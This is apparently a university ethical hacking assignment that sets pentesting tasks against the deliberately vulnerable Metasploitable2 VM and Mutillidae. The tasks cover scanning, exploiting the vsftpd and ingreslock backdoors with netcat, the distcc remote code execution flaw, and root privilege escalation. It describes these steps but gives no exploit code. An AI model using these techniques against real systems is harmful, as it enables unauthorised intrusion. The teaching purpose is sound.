1
Info3002 Ethical Hacking Principles and Practice
Pentesting Project
Due: 9pm, Friday, 1 0 June 2022
In this project, you will mainly pentest the Metasploitable2 VM by accomplishing the tasks described
elow. The tasks in this document will be a little harder than what you have seen in our lectures and labs.
However, the basic skills involved are similar.
Since pentesting is of exploration nature, you should try to complete the tasks without seeking help
from tutors. There are hints and notes provided within this document to help you. Besides these, you should
do research yourself first if you encounter difficulty in completing a task. For instance, if you do not know
the usage of the 'xxx' command and its options, use ‘man xxx’ to find out. After you have tried almost
everything and still cannot figure out, limited help can be obtained from tutors.
Write your answers for all tasks into a project report. When asked to grab a screenshot in a task, the
screenshot must include the VM name which includes your Student ID. If you are using VMs created on
your own laptop, then the screenshot must show the IP address of the target somewhere. For instance, the
target IP can appear in your command line, or if the command line does not include the target IP, you can
use ‘ip a’ command to display the IP address intentionally. An exemplar screenshot is included as follows.
Failing to do so will cause you lose marks for relevant tasks.
You are suggested to read the entire specification first, and then start with the tasks that are already
covered by our lectures, and especially Task 6.
1 General Hacking Capability [2 marks]
1.1 Give your answer to the following cryptogram, and attach at least two screenshots of your own
handwritings (one during the solving process and the other on the final result) to prove that it is solved by
yourself. If you forget about cryptogram, please refer to the last task of Lab 1. Since you cannot play it
using the website (you have to use paper and pencil), we offer you a hint that ‘Q’ is ‘T’. [1 mark]
This project is of individual work. By working on this project, you promise
that you will never ask or offer inappropriate help from/to others.
2
1.2 Give your answer to the following matchstick puzzle. You are only allowed to move one matchstick
to make the equation hold. All matchsticks have to be used, and you shouldn’t make it an inequality. We
emphasize again that you should not ask or share your answers with others. [1 mark]
2 Service and Vulnerability Detection [3 marks]
2.1 If using nmap to scan all TCP ports of Metasploitable2 instead of the default 1000 ports, it will show that
the port 8787 is open. Suppose you are interested in knowing which service is running on this TCP port.
Use nmap to scan only this port to achieve this. [1 mark]
a) Include a screenshot showing your command line and its output.
) Then, based on the output, use your own words to describe the detected service and software version
into your report.
2.2 In GVM, explore its interface to create a port list with all TCP ports XXXXXXXXXXincluded (let's ignore port
0, which is a port number not supported by all OS kernels). Name this port list All TCP Ports. Then,
create a target for scanning the Metasploitable2 VM with this port list. Finally, create a task to scan this
target with 'Full and Fast' as the Scan Config.
a) Detail your steps for achieving the above into your project report and include a screenshot for port list
creation, target creation and task creation respectively. [1 mark]
) Complete the scan task created above, and obtain the PDF report from this scan. Compare this report
(denoted by Report 1) with the report you obtained from Lab 4 Task 4.8 (denoted by Report 2).
Detail how you have made the comparison, and give at least one TCP port that is shown to have
severity 'High' results in Report 1, but not listed in Report 2. Also, list the severity 'High' results from
that port. [1 mark]
3
3 Exploitation [3 marks]
3.1 The "Metasploitable 2 Exploitability Guide" (https:
metasploit.help.rapid7.com/docs/metasploitable-2-
exploitability-guide ) gives a great tutorial on how to exploit the Metasploitable2 VM. Please read through
this guide, and especially focus on the ‘Services: Backdoors’ section. Then, accomplish the following
tasks.
a) The ‘Services: Backdoors’ section first describes how to manually exploit the backdoor in the tampered
FTP server VSFTPD v2.3.4. Follow it to complete the exploitation on your Metasploitable2 using 'nc'
instead of 'telnet'. Detail your steps and include a screenshot on your success. This screenshot should
include the 'nc' command line, and the results of executing the following commands after gaining
access: ‘id’, ‘ip addr show dev eth0’, and ‘hostname’. [1 mark]
Note:
The 'telnet' command has been deprecated in Linux today. This is why you are asked to use the 'nc'
command instead. The 'nc' command runs the 'netcat' tool, which is very flexible and is du
ed 'the
Swiss army knife for networking'. The 'netcat' tool will be covered in Week 7's lecture.
) The ‘Services: Backdoors’ section also describes how to exploit the old standby "ingreslock" backdoor
that is listening on port 1524. Use the ‘netcat’ tool instead of ‘telnet’ to accomplish this exploitation.
Detail your steps and include a screenshot on your success. This screenshot should include the 'netcat'
command line, and the results of executing the following commands after gaining access: ‘whoami’,
‘ip a show dev eth0’, and ‘pwd’. [1 mark]
3.2 Your GVM report for Metasploitable2 obtained in Task 2.2 should show the ‘distcc Remote Code
Execution Vulnerability’ on TCP port 3632. Follow the Section 6 Steps 1-5 from the following tutorial
https:
www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesso
n2/index.html to exploit this vuln. Detail your steps and include a screenshot on your success. This
screenshot should include the results of executing the following commands after gaining access: whoami
and 'ip a show dev eth0'. [1 mark]
Note: The ‘BackTrack’ mentioned in this tutorial is the previous name of Kali Linux. Moreover, since
Kali 2020, you need to add 'sudo' before 'msfconsole' when starting msfconsole.
4 Post Exploitation [3 marks]
After completing Task 3.2, you will notice that the user account you get is ‘daemon’, not ‘root’. Follow
the Section 6 Steps 6-10 from the tutorial mentioned in Task 3.2 to escalate the privilege to ‘root’. Detail
your steps and include a screenshot on your success. This screenshot should include the results of
executing the following commands in the obtained ‘netcat’ session: 'whoami' and 'ip a show dev eth0'. The
different things you should do from this tutorial are mentioned in the hints below. [3 marks]
Hints:
• Since the VMs in our school cloud might not be allowed to visit exploit-db.com, you should obtain the
'exploit-8572.c' through another method. We recommend you to use 'searchsploit' to find it in the local
installation of exploit-db in your Kali. You will see that it is named '8572.c' in the local installation of
exploit-db. Refer to our lecture 5 about 'searchsploit'.
• To upload '8572.c' to Metasploitable2, there can be several methods. Here we suggest to you to use
netcat, which is available in both Metasploitable2 and Kali. Basically, in your Kali, start a new
terminal, and then run 'netcat' in server mode to transfer this file, and finally hit 'Ctrl +c' to end the
transmission when you estimate the transmission is over. And in the remote shell you obtained in Task
3.2, run 'netcat' in client mode to receive this file; after the transmission is over, use 'ls -l' to double
check if it is received.
https:
metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
https:
metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
https:
www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson2/index.html
https:
www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson2/index.html
4
• In Linux, sometimes you don't see responses to your commands, but you should still proceed. Check
if it is a success by issuing verifying command.
• Since Kali 2020, 'sudo' is needed when running 'netcat' in server mode.
This task is very challenging. Be very careful and make sure you understand every step. You can also
watch the following video on Youtube to get a clearer idea on this privilege escalation:
https:
www.youtube.com/watch?v=DoUZFHwZntY .
5 Web Pentesting [4 marks]
In our lectures and labs, we used the DVWA as our web pentesting target. In this project, you will be
asked to pentest another intentionally vulnerable web application called ‘Mutilliadae’, which is also
installed in Metasploitable2.
The use of Mutillidae is straightforward. Simply enter the following URL into Firefox: http:
IP of
Metasploitable2
mutillidae/, and you will see the Mutillidae interface. If you see there are warning
messages from the database, you should click the ‘Reset DB’ link in the Mutillidae interface to restore the
database to its initial state. Then, those warning messages should disappear. Note that, different from
DVWA, you do not need to log into Mutillidae to access its pages. Also note that, the default security level
of Mutillidae is ‘0’ (the lowest security level) when you start
owsing this application (see the screenshot
elow). This is the security level you should use during your pentest, and you should leave it as it is, i.e.,
never toggle it.
Mutillidae contains the pages co
esponding to the OWASP Top 10 Security Risks. These pages can
e accessed by the ‘OWASP Top 10’ menu located in the left. In this project, you are only required to